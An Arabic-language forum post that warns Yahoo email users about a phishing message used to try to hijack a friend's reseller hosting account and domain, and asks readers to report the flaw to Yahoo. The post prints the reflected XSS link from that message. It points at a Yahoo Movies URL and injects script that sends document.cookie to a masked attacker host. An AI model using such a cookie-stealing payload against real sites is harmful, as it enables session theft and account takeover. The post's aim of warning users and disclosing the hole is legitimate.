السلام عليكم ورحمة الله وبركاته
اللي إيملاتهم الياهوو او على نفس السيرفر
راح اقولك الطريقه اللي كان يريد يسحب بها دومين أحد الربع وكان موقع هكر وداخل في المشكله من زمان طبعا بدون تعليق ولكن الزبده هي
انه قام بمحاول اختارق حساب الرستلر اللي في انيموا عن طريقبعض الرسايل الملغومه بذكاء
طلبت نسخه من الرساله مشبوه وذكيه الملقوف راح يدخل علطول وهو ما يفكر
المهم بعد تعقب الروابط وصلت ا أخر شي ل هذا قمت بمسح رابط اللوج حتى لايدخل احد بالغلط
كود PHP:
http://malaysia.movies.yahoo.com/What%20Happens%20In%20Vegas/movie/14593/photos/?id="><script>location.href='http://XXX/XXX.php?cookie='+escape(document.cookie)</script>
كما تلاحظون هذا xss في الياهوو
وأغلب اللي انسحبت دوميناتهم أما الياهو او إيميل من نفس السيرفر
لا أقول هذا فقط الذي عند الهكر ولا هذا اللي كان يحاول ل يخترق دومين صاحبي
وأرجول للفاضي تبليغ الياهوو عن هذي الثغره وشكرا